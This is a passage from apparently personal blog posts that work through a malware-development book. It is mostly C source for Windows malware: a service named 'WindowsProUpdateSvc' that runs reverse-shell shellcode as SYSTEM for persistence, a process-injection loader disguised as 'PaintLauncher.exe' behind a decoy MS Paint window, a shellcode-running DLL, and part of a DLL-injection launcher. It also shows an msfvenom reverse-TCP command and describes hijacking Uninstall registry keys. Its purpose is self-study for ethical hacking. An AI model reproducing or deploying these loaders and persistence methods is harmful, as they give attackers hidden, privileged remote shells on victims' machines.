class="nf">ControlHandler</span><span class="p">(</span><span class="n">DWORD</span><span class="w"> </span><span class="n">request</span><span class="p">);</span> <span class="c1">// reverse shell</span> <span class="kt">void</span><span class="w"> </span><span class="nf">PhoneHome</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// allocate memory for the payload</span> <span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="o">*</span><span class="n">alloc_mem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAlloc</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">payload_size</span><span class="p">,</span><span class="w"> </span><span class="n">MEM_COMMIT</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">MEM_RESERVE</span><span class="p">,</span><span class="w"> </span><span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">alloc_mem</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">){</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"memory allocation failed: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span> <span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// copy the payload into the newly allocated memory buffer</span> <span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">alloc_mem</span><span class="p">,</span><span class="w"> </span><span class="n">payload</span><span class="p">,</span><span class="w"> </span><span class="n">payload_size</span><span class="p">);</span> <span class="w"> </span><span class="c1">// cast the memory buffer to a function pointer, then call the function to execute</span> <span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">execute</span><span class="p">)()</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="kt">void</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">alloc_mem</span><span class="p">;</span> <span class="w"> </span><span class="n">execute</span><span class="p">();</span> <span class="w"> </span><span class="c1">// clean up (will most likely not be reached as the rev shell will hang during execute)</span> <span class="w"> </span><span class="n">VirtualFree</span><span class="p">(</span><span class="n">alloc_mem</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">MEM_RELEASE</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(){</span> <span class="w"> </span><span class="n">SERVICE_TABLE_ENTRY</span><span class="w"> </span><span class="n">ServiceTable</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="p">{</span><span class="s">"WindowsProUpdateSvc"</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPSERVICE_MAIN_FUNCTION</span><span class="p">)</span><span class="w"> </span><span class="n">ServiceMain</span><span class="p">},</span> <span class="w"> </span><span class="p">{</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">}</span> <span class="w"> </span><span class="p">};</span> <span class="w"> </span><span class="n">StartServiceCtrlDispatcher</span><span class="p">(</span><span class="n">ServiceTable</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// this is the main function to start our service and handle any future requests for state change</span> <span class="c1">// https://learn.microsoft.com/en-us/windows/win32/services/service-servicemain-function</span> <span class="kt">void</span><span class="w"> </span><span class="nf">ServiceMain</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">**</span><span class="w"> </span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwServiceType</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SERVICE_WIN32</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwCurrentState</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SERVICE_START_PENDING</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwControlsAccepted</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SERVICE_ACCEPT_STOP</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">SERVICE_ACCEPT_SHUTDOWN</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwWin32ExitCode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwServiceSpecificExitCode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwCheckPoint</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwWaitHint</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="c1">// call the handler and call our payload function</span> <span class="w"> </span><span class="n">hStatus</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RegisterServiceCtrlHandler</span><span class="p">(</span><span class="s">"WindowsProUpdateSvc"</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPHANDLER_FUNCTION</span><span class="p">)</span><span class="n">ControlHandler</span><span class="p">);</span> <span class="w"> </span><span class="n">PhoneHome</span><span class="p">();</span> <span class="w"> </span><span class="c1">// set the service as running</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwCurrentState</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SERVICE_RUNNING</span><span class="p">;</span> <span class="w"> </span><span class="n">SetServiceStatus</span><span class="p">(</span><span class="n">hStatus</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">serviceStatus</span><span class="p">);</span> <span class="w"> </span><span class="c1">// logic is handled by PhoneHome, this service app can sleep while service running</span> <span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwCurrentState</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">SERVICE_RUNNING</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">Sleep</span><span class="p">(</span><span class="n">SLEEP_TIME</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// important for handling a change in status</span> <span class="c1">// https://learn.microsoft.com/en-us/windows/win32/services/service-control-handler-function</span> <span class="kt">void</span><span class="w"> </span><span class="nf">ControlHandler</span><span class="p">(</span><span class="n">DWORD</span><span class="w"> </span><span class="n">request</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">switch</span><span class="p">(</span><span class="n">request</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="no">SERVICE_CONTROL_STOP</span><span class="p">:</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwWin32ExitCode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwCurrentState</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SERVICE_STOPPED</span><span class="p">;</span> <span class="w"> </span><span class="n">SetServiceStatus</span><span class="w"> </span><span class="p">(</span><span class="n">hStatus</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">serviceStatus</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="no">SERVICE_CONTROL_SHUTDOWN</span><span class="p">:</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwWin32ExitCode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="n">serviceStatus</span><span class="p">.</span><span class="n">dwCurrentState</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SERVICE_STOPPED</span><span class="p">;</span> <span class="w"> </span><span class="n">SetServiceStatus</span><span class="w"> </span><span class="p">(</span><span class="n">hStatus</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">serviceStatus</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="p">;</span> <span class="w"> </span><span class="k">default</span><span class="o">:</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">SetServiceStatus</span><span class="p">(</span><span class="n">hStatus</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">serviceStatus</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>With the service executable built, we can call <code>sc.exe create WindowsProUpdateSvc binpath="C:\\UpdateSvc.exe" start=auto</code> to create our service. Next <code>sc.exe start WindowsProUpdateSvc</code> to start our new service.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-53.webp"/></p> <p>service started, reverse shell as NT Authority\System granted</p> <p>I much preferred my method in combining the payload and service creation executables into a single executable for registration. This persistence method has granted us SYSTEM privileges via our reverse shell. We could additionally ensure the service auto-starts as well for further persistence.</p> <p>A neat trick I noticed is that as long as the reverse shell was running, the service would not respond to <code>sc.exe stop</code> or <code>sc.exe delete</code> commands. I had to kill the remote shell via my linux machine and then it finally deleted on the host.</p> <h1 id="further-loopholes">Further Loopholes</h1> <h2 id="uninstall-registry-keys">Uninstall Registry Keys</h2> <p>I did not create code for this exploit, as it is almost identical to the registry persistence code from before, but it instead targets a different registry key.</p> <p>This particular persistence technique involves navigating to <code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall</code> and picking a target application from the list to modify.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-54.webp"/></p> <p>Uninstall strings</p> <p>Using any method, the book author writes another c code / executable for this, modify the value for the uninstall strings to instead point to the malicious application. If the user then attempts to go to Control Panel &gt; Uninstall a Program, and uninstalls the target application, it will instead launch the malicious executable. This method of persistence requires the end-user to actively search for the target application and attempt to uninstall it. Theoretically, a script could enumerate all of the applications in the directory and change ALL Uninstall strings to target the malicious executable. It would then have cast a wider net in attempts to secure a launch but still requires the end user to attempt to uninstall an application.</p>2025-01-19T18:53:32-05:002025-01-19T18:53:32-05:00Eric Turnertag:blog.ericturner.it,2025-01-19:/2025/01/19/malware-dev-chapter-02-injection/

<p>Continued series from the <a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.</p> <p>The first part of this chapter deals with process and DLL injection. I will break the APC injection and API hooking</p> <h2 id="process-injection">Process Injection</h2> <p>I followed the book in generating a reverse shell payload using <code>msfvenom</code>:</p> <div class="highlight"><pre><span></span><code>msfvenom<span class="w"> </span>-p<span class="w"> </span>windows/x64/shell_reverse_tcp …</code></pre></div>

<p>Continued series from the <a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.</p> <p>The first part of this chapter deals with process and DLL injection. I will break the APC injection and API hooking</p> <h2 id="process-injection">Process Injection</h2> <p>I followed the book in generating a reverse shell payload using <code>msfvenom</code>:</p> <div class="highlight"><pre><span></span><code>msfvenom<span class="w"> </span>-p<span class="w"> </span>windows/x64/shell_reverse_tcp<span class="w"> </span>LHOST-10.0.3.4<span class="w"> </span><span class="nv">LPORT</span><span class="o">=</span><span class="m">4444</span><span class="w"> </span>-f<span class="w"> </span>c </code></pre></div> <p>This provides an <code>unsigned char buf[]</code> that can be pasted into C code. The original code also requires manually spawning the appropriate process and specifying the PID to inject. Instead, I made a modification to automatically spawn a process and grab the ID to use. Now, when the executable, which I cleverly named <code>PaintLauncher.exe</code> is ran, a copy of MS Paint is launched. In the background, a secret terminal is also launched with it which allows our reverse shell to connect:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-44.webp"/></p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Proc Injection of Reverse TCP</span> <span class="cm"> 19 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 02_proc_injection.c -o PaintLauncher.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="c1">// created with msfvenom, truncated for web view</span> <span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">payload</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"..."</span><span class="p">;</span> <span class="c1">// get size of payload to determine buffer size during injection</span> <span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">payload_length</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">payload</span><span class="p">);</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(){</span> <span class="w"> </span><span class="n">STARTUPINFO</span><span class="w"> </span><span class="n">si</span><span class="p">;</span><span class="w"> </span><span class="c1">// declaration for startupinfo</span> <span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="w"> </span><span class="n">pi</span><span class="p">;</span><span class="w"> </span><span class="c1">// declaration for procinfo</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">process_handle</span><span class="p">;</span><span class="w"> </span><span class="c1">// Handle for the target process</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">remote_thread</span><span class="p">;</span><span class="w"> </span><span class="c1">// Handle for the remote thread</span> <span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">remote_buffer</span><span class="p">;</span><span class="w"> </span><span class="c1">// Buffer in the remote process</span> <span class="w"> </span><span class="c1">// Initialize the STARTUPINFO structure</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">));</span> <span class="w"> </span><span class="n">si</span><span class="p">.</span><span class="n">cb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">);</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pi</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">pi</span><span class="p">));</span> <span class="w"> </span><span class="c1">//attempt to launch the mspaint decoy process</span> <span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">CreateProcess</span><span class="p">(</span><span class="s">"C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">mspaint.exe"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pi</span><span class="p">)){</span> <span class="w"> </span><span class="c1">// grab proc id</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Process created successfully!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Process ID: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pi</span><span class="p">.</span><span class="n">dwProcessId</span><span class="p">);</span> <span class="w"> </span><span class="n">process_handle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"> </span><span class="n">pi</span><span class="p">.</span><span class="n">dwProcessId</span><span class="p">);</span> <span class="w"> </span><span class="c1">// alloc mem for the payload</span> <span class="w"> </span><span class="n">remote_buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">payload_length</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">MEM_RESERVE</span><span class="o">|</span><span class="n">MEM_COMMIT</span><span class="p">),</span><span class="w"> </span><span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="w"> </span><span class="c1">// copy payload into buffer</span> <span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="n">remote_buffer</span><span class="p">,</span><span class="w"> </span><span class="n">payload</span><span class="p">,</span><span class="w"> </span><span class="n">payload_length</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Create a remote thread to start payload</span> <span class="w"> </span><span class="n">remote_thread</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateRemoteThread</span><span class="p">(</span><span class="n">process_handle</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">remote_buffer</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// clean up payload handle</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">process_handle</span><span class="p">);</span> <span class="w"> </span><span class="c1">// clean up our decoy process</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hProcess</span><span class="p">);</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">pi</span><span class="p">.</span><span class="n">hThread</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">else</span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"CreateProcess failed (%lu).</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>This also shows the connection via System Informer, under the network tab, as mspaint.exe:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-45.webp"/></p> <h2 id="dll-injection">DLL Injection</h2> <p>The book uses a MessageBox code to display for the DLL Injection. I instead modified this to instead have my DLL spawn a reverse shell, like before.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> DLL for DLL Injection</span> <span class="cm"> 19 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-g++ -shared -o update.dll 02_dll.c -fpermissive</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">payload</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"..."</span><span class="p">;</span> <span class="n">BOOL</span><span class="w"> </span><span class="n">APIENTRY</span><span class="w"> </span><span class="n">DllMain</span><span class="p">(</span><span class="n">HMODULE</span><span class="w"> </span><span class="n">hModule</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">nReason</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpReserved</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">switch</span><span class="w"> </span><span class="p">(</span><span class="n">nReason</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="no">DLL_PROCESS_ATTACH</span><span class="p">:</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Allocate memory for the shellcode</span> <span class="w"> </span><span class="kt">void</span><span class="o">*</span><span class="w"> </span><span class="n">exec_mem</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">payload</span><span class="p">),</span><span class="w"> </span><span class="n">MEM_COMMIT</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">MEM_RESERVE</span><span class="p">,</span><span class="w"> </span><span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">exec_mem</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Copy the shellcode to the allocated memory</span> <span class="w"> </span><span class="n">memcpy</span><span class="p">(</span><span class="n">exec_mem</span><span class="p">,</span><span class="w"> </span><span class="n">payload</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">payload</span><span class="p">));</span> <span class="w"> </span><span class="c1">// Create a thread to execute the shellcode</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hThread</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateThread</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">LPTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">exec_mem</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">hThread</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">hThread</span><span class="p">);</span><span class="w"> </span><span class="c1">// Cleanup</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="no">DLL_PROCESS_DETACH</span><span class="p">:</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="no">DLL_THREAD_ATTACH</span><span class="p">:</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="no">DLL_THREAD_DETACH</span><span class="p">:</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>Next, I repurposed the same code as before to auto-launch mspaint, but instead we attach the DLL.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> Proc Injection of Reverse TCP</span> <span class="cm"> 19 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 02_dll_injection.c -o PaintLauncherDLL.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="kt">char</span><span class="w"> </span><span class="n">maliciousDLL</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"C:</span><span class="se">\\</span><span class="s">update.dll"</span><span class="p">;</span> <span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">dll_length</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">maliciousDLL</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(){</span> <span class="w"> </span><span class="n">STARTUPINFO</span><span class="w"> </span><span class="n">si</span><span class="p">;</span><span class="w"> </span><span class="c1">// declaration for startupinfo</span> <span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="w"> </span><span class="n">pi</span><span class="p">;</span><span class="w"> </span><span class="c1">// declaration for procinfo</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">process_handle</span><span class="p">;</span><span class="w"> </span><span class="c1">// Handle for the target process</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">remote_thread</span><span class="p">;</span><span class="w"> </span><span class="c1">// Handle for the remote thread</span> <span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">remote_buffer</span><span class="p">;</span><span class="w"> </span><span class="c1">// Buffer in the remote process</span> <span class="w"> </span><span class="c1">// Initialize the STARTUPINFO structure</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">));</span> <span class="w"> </span><span class="n">si</span><span class="p">.</span><span class="n">cb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">si</span><span class="p">);</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pi</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">pi</span><span class="p">));</span> <span class="w"> </span><span class="c1">//attempt to launch the mspaint decoy process</span> <span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">CreateProcess</span><span class="p">(</span><span class="s">"C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">mspaint.exe"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pi</span><span class="p">)){</span> <span class="w"> </span><span class="c1">// Handle to kernel32 and pass it to GetProcAddress</span> <span class="w"> </span><span class="n">HMODULE</span><span class="w"> </span><span class="n">kernel32_handle</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="s">"Kernel32"</span><span class="p">);</span> <span class="w"> </span><span class="n">VOID</span><span class="w"> </span><span class="o">*</span><span class="n">lbuffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">kernel32_handle</span><span class="p">,</span><span class="w"> </span><span class="s">"LoadLibraryA"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// grab proc id</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Process created successfully!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Process ID: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pi</span><span class="p">.</span><span class="n">dwProcessId</span><span class="p">);</span> <span class="w"> </span><span 